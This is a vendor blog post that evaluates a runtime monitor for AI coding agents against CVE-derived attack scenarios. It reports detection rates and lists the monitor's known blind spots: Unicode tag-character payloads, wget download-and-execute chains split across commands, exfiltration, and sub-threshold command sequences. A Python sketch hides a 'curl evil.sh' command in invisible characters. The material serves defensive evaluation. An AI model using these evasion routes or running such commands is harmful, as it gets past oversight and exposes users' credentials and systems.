84% Detection on Novel Attacks: Inside Our Monitor Eval
We evaluated Firmis Monitor against 278 CVE-derived attack scenarios and 49 published CVE reproductions. Here is every number, including the gaps.
TL;DR
- 84.17% of CVE-derived attack scenarios blocked before they could reach your credentials, files, or network. No prior exposure to any test case.
- 100% detection across six critical categories: backdoor, exfil, identity, lateral movement, persistence, and RCE. These cover the attacks that cause real breaches.
- Known gaps published transparently: unicode tag injection, wget chains, port exposure. You can evaluate whether these are in your threat model.
- Blast radius scoring catches model mistakes that rules miss. 0% false positives on real coding sessions, so your workflow stays uninterrupted.
Evaluation methodology matters more than the headline number. A detector trained and tested on the same dataset can report 99% accuracy while failing completely on the first novel attack it encounters in production. We built three independent test sets to avoid that failure mode, and this post explains every number from each one.
Three-Tier Evaluation Design
We used three distinct holdout sets, each measuring something different. The overall 84% figure comes from the set that matters most: cases the system never saw during rule development.
Primary Results: Pentest Novel (N=278)
All 278 cases were developed from published CVEs across real AI agent products. No case was seen during rule development. For teams evaluating runtime protection, this is the number that matters: 84% of real-world attack patterns are blocked before they reach your credentials, files, or network. The remaining 16% are documented below so you can assess whether they fall within your threat model.
The 19.4% on supply chain is not a monitor failure. Supply chain attacks are covered by a separate package integrity checker that runs at install time, not at runtime, and this eval tested runtime detection only. The 0% on injection is a genuine gap: detecting injection requires inspecting model outputs, which the current monitor layer does not do.
Adversarial Results: Rehberger CVE Set (N=49)
The Rehberger set is the hardest test we ran. These 49 cases come from published CVE research across 13 AI coding products. The attacks are maximally adversarial: designed by a skilled researcher specifically to evade detection in real production systems.
What the gaps tell us
- unicode-tag-injection hides payloads in Unicode tag characters. Detection requires Unicode normalization in the rule engine, not yet implemented.
- zombai-download-execute chains wget with shell execution across two separate commands. The rule engine evaluates commands individually, not as sequences.
- token-exfil and port-exposure require network-layer inspection beyond filesystem and process monitoring.
- self-config-rce targets the monitor configuration itself. A known bootstrapping problem.
- All five are on the roadmap. Documenting them here is deliberate.
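To make the unicode-tag-injection gap concrete, here is a minimal sketch of what scanning for tag characters could look like. It is not Firmis Monitor's rule engine: the function names are hypothetical, and the only external fact it relies on is that the Unicode Tags block spans U+E0000 to U+E007F, with U+E0020 to U+E007E mirroring printable ASCII.

```python
# Illustrative sketch only; all helper names are hypothetical.
# The Unicode "Tags" block occupies U+E0000..U+E007F.
TAG_BLOCK_START = 0xE0000
TAG_BLOCK_END = 0xE007F


def is_tag_character(ch: str) -> bool:
    """True if ch falls inside the Unicode Tags block."""
    return TAG_BLOCK_START <= ord(ch) <= TAG_BLOCK_END


def find_tag_characters(text: str) -> list:
    """Return (index, codepoint label) pairs for every tag character."""
    return [
        (i, f"U+{ord(ch):05X}")
        for i, ch in enumerate(text)
        if is_tag_character(ch)
    ]


def decode_hidden_payload(text: str) -> str:
    """Map tag characters U+E0020..U+E007E back to the ASCII they mirror."""
    return "".join(
        chr(ord(ch) - TAG_BLOCK_START)
        for ch in text
        if 0xE0020 <= ord(ch) <= 0xE007E
    )


def strip_tag_characters(text: str) -> str:
    """Remove tag characters so downstream rules see only visible text."""
    return "".join(ch for ch in text if not is_tag_character(ch))


# A visible command with an invisible payload appended.
hidden = "".join(chr(TAG_BLOCK_START + ord(c)) for c in "curl evil.sh")
command = "ls -la" + hidden
```

In this sketch `command` renders as `ls -la` in most terminals, while `decode_hidden_payload(command)` recovers the invisible text. A real rule engine would also need to decide whether to block, strip, or only flag such input.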
Transparency about gaps is not a concession. It is the only way to give users an accurate threat model.
Systematic Scorer: Holdout Results (N=230)
Beyond rule-based detection, Firmis Monitor includes a systematic scorer that computes a risk score across multiple behavioral signals. The scorer was evaluated on a separate 230-case holdout set.
The 0% false positive rate on real coding tasks (intercode_benign dataset) is the number we are most careful about. A runtime monitor that fires on legitimate work is worse than no monitor: teams disable it within days. We tested against actual developer workflows and found zero false positives. That means your developers can keep Firmis Monitor running continuously without workflow interruption.
The sanity gate passed: holdout F1 (0.9535) exceeds full-set F1 by 0.0087, so the holdout shows no sign of overfitting. We flagged 2 zero-contribution rules for suppression; they matched nothing in either the training or holdout sets and are being removed in the next release.
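The sanity gate described above can be sketched in a few lines. This is an assumption about its shape, not the actual implementation: the function names, the zero tolerance, and the example rule names are hypothetical, and the full-set F1 is derived from the two figures reported in this post rather than stated directly.

```python
# Illustrative sketch only; function names and tolerance are hypothetical.

def f1_score(tp: int, fp: int, fn: int) -> float:
    """F1 from confusion-matrix counts: 2TP / (2TP + FP + FN)."""
    denom = 2 * tp + fp + fn
    return 2 * tp / denom if denom else 0.0


def sanity_gate(holdout_f1: float, full_set_f1: float, tolerance: float = 0.0):
    """Pass when holdout F1 is not lower than full-set F1 by more than tolerance.

    A holdout score well below the full-set score suggests rules were
    tuned to cases the holdout does not contain.
    """
    delta = holdout_f1 - full_set_f1
    return delta >= -tolerance, delta


def zero_contribution_rules(match_counts: dict) -> list:
    """Rules that matched nothing across the evaluated sets."""
    return sorted(name for name, count in match_counts.items() if count == 0)


HOLDOUT_F1 = 0.9535
FULL_SET_F1 = HOLDOUT_F1 - 0.0087  # derived from the reported gap

passed, delta = sanity_gate(HOLDOUT_F1, FULL_SET_F1)
```

The per-rule match counts that would feed `zero_contribution_rules` are not published here, so any input to it is illustrative.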
Blast Radius: The Unique Signal
Every detected event is assigned an impact tier based on what the agent action could actually reach: files, credentials, network endpoints, other processes. Two actions with identical rule triggers can have radically different real-world consequences. Blast radius quantifies that difference.
The 35% on model mistakes is particularly important. When an agent performs a dangerous action with benign intent, for example overwriting a config file because a user asked it to clean up the project, the intent is not malicious but the blast radius is still elevated. Policy rules based on user intent cannot catch this. Blast radius scoring can.
The 25% on adversarial evasion is also notable. Some attacks are designed to keep each individual command below rule thresholds. The blast radius scorer evaluates aggregate effect across a session, catching what per-command rules miss.
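The difference between per-command and session-level evaluation can be illustrated with a toy example. This post does not describe how the blast radius scorer aggregates, so everything here is an assumption: the per-command scores, both thresholds, and the use of a plain sum are hypothetical stand-ins chosen to show the idea.

```python
# Illustrative sketch only; scores, thresholds, and summation are hypothetical.
from dataclasses import dataclass


@dataclass(frozen=True)
class CommandEvent:
    command: str
    score: float  # hypothetical per-command risk score in [0, 1]


PER_COMMAND_THRESHOLD = 0.7  # hypothetical rule threshold
SESSION_THRESHOLD = 1.5      # hypothetical aggregate threshold


def per_command_alerts(events: list) -> list:
    """Events that would trip a rule when evaluated in isolation."""
    return [e for e in events if e.score >= PER_COMMAND_THRESHOLD]


def session_score(events: list) -> float:
    """Aggregate effect across the session (a simple sum in this sketch)."""
    return sum(e.score for e in events)


def session_alert(events: list) -> bool:
    return session_score(events) >= SESSION_THRESHOLD


# Each step stays under the per-command threshold on its own.
session = [
    CommandEvent("read credentials file", 0.5),
    CommandEvent("archive project directory", 0.5),
    CommandEvent("open outbound connection", 0.6),
]
```

Here no single command raises an alert, but the session as a whole does. A production scorer would likely weight what each action can reach rather than add flat scores.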
Feature Discrimination: What the Scorer Learned
Three features drove the strongest separation between attacks and benign sessions. Cohen's d values are from the holdout set:
- Shannon entropy of command output. Attacks produce distinctive entropy patterns: very low (structured credential data) or very high (encrypted exfil payloads).
- Composite score of potential impact scope. Attacks reaching outside the project directory or touching credential files score significantly higher.
- Boolean flag for operations targeting paths outside the working directory. Simple signal, strong discriminator.
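For readers who want to reproduce this kind of analysis on their own data, here is a minimal sketch of two of the signals and of Cohen's d. The formulas are standard; the function names are hypothetical, and nothing here reflects how Firmis Monitor computes its features internally.

```python
# Illustrative sketch only; function names are hypothetical.
import math
from collections import Counter
from pathlib import Path
from statistics import mean, variance


def shannon_entropy(data: bytes) -> float:
    """Entropy in bits per byte: 0.0 for constant data, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    total = len(data)
    counts = Counter(data)
    return -sum((c / total) * math.log2(c / total) for c in counts.values())


def targets_outside_workdir(target: str, workdir: str) -> bool:
    """True when target resolves to a path outside workdir.

    Relative targets are interpreted against workdir; '..' segments and
    symlinks are resolved before the comparison. Requires Python 3.9+.
    """
    resolved_workdir = Path(workdir).resolve()
    resolved_target = Path(workdir, target).resolve()
    return not resolved_target.is_relative_to(resolved_workdir)


def cohens_d(group_a: list, group_b: list) -> float:
    """Standardized mean difference using the pooled sample variance."""
    na, nb = len(group_a), len(group_b)
    pooled_var = (
        (na - 1) * variance(group_a) + (nb - 1) * variance(group_b)
    ) / (na + nb - 2)
    if pooled_var == 0:
        raise ValueError("pooled variance is zero; Cohen's d is undefined")
    return (mean(group_a) - mean(group_b)) / math.sqrt(pooled_var)
```

To measure how well a feature separates the two classes, compute it per session and pass the attack values and benign values to `cohens_d`. By common convention, values above roughly 0.8 are read as a large effect.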
What This Means for Production Use
- 84% detection on novel attacks with 0% false positives on real coding sessions. This is a usable signal, not a lab number.
- The gaps are documented and bounded. If unicode steganography or multi-step wget chains are in your threat model, track the roadmap for those specific rule additions.
- Blast radius scoring adds a layer that static rules cannot provide: it catches model mistakes and resource abuse independent of attack intent.
- The scorer complements rules; it does not replace them. Both layers are active in production.
- 79.6% on the Rehberger adversarial CVE set reflects real-world capability against published, expert-crafted attacks.
Run Firmis Monitor on your agent stack
- Install: npx firmis-cli monitor (watches your coding agent sessions in real time)
- Review the gap list above. If unicode-tag-injection or wget chains are in your threat model, track the roadmap for those rule additions.
- The free tier includes passive monitoring. Active blocking and blast radius dashboards are Pro tier.
We will update this post as gap coverage improves. Every claim above will be re-evaluated against the same holdout sets so the numbers remain comparable across versions.
References & Sources
- [1] Rehberger CVE research across AI coding products: 49 cases, 13 products, maximally adversarial test set
- [2] InterCode benchmark (benign coding tasks): used for false positive validation (0% FP rate)
- [3] CVE-2025-59536, Claude Code hooks injection: one of 49 CVEs in the Rehberger adversarial set
- [4] Unicode tag steganography in prompt injection: known gap, payloads hidden in Unicode tag characters (U+E0001-U+E007F)
- [5] MITRE ATT&CK for AI Systems: attack category taxonomy used for classification
- [6] Firmis Monitor: runtime protection with policy rules + systematic scorer + blast radius